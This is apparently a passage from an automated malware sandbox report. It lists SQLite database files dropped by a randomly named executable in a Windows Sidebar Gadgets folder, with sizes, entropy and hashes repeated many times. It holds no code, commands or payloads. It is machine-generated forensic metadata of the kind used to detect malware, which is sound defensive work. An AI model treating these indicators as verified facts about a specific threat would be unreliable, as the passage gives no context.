                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
